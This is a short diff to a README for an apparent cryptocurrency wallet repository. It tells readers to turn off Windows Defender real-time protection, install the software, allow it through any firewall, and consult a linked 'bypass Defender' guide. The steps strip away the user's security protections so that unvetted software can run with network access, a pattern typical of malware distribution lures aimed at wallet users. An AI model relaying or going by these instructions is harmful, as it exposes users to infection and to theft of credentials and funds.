UnvsCom/Wallets/README.md

 6) You’ll be redirected to a new page.
 Here, **click on the Real-time protection toggle to turn off Windows Defender**.

+Then you should be able to download and install freely.
+You can even activate Windows Defender after installation.
+Ensure to allow connections through any firewall.

 For a PDF menu navigation guide, see here: https://github.com/UnvsCom/Current-Wallet-Releases/blob/main/BYPASS-DEFENDER.pdf